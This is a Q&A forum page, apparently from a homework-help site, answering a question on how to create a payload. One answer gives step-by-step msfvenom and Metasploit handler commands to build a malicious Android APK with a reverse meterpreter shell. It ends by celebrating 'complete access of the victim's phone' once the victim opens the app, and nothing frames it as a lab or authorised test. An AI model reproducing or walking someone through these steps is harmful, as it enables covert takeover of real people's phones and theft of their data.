how to create a payload
Answers
Answered by
0
Metasploit payload can be generate from with in the msfconsole .You will most certainly need to generate shellcode to use in your exploits.
Answered by
5
After Installing Metasploit >>>
Type this command :
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT=4444 R > (name of apk file).apk
*Wait 30 sec*
then type :
msfconsole
*Wait 30 sec*
enter following commands:
1. use exploit/multi/handler
2. set payload android/meterpreter/reverse_tcp
3. set LHOST (your ip address)
4. set LPORT 4444
5. exploit
Now as soon as the Victim installs and tries to open up the Payload (apk) on their device, you’ll get a Meterpreter Session.
SO, THERE YOU HAVE IT. COMPLETE ACCESS OF THE VICTIM’S PHONE RIGHT ON YOUR SCREEN!
LIKE IT ✓
Similar questions
Computer Science,
8 months ago
Math,
8 months ago
Hindi,
8 months ago
Chemistry,
1 year ago
Political Science,
1 year ago
Math,
1 year ago
English,
1 year ago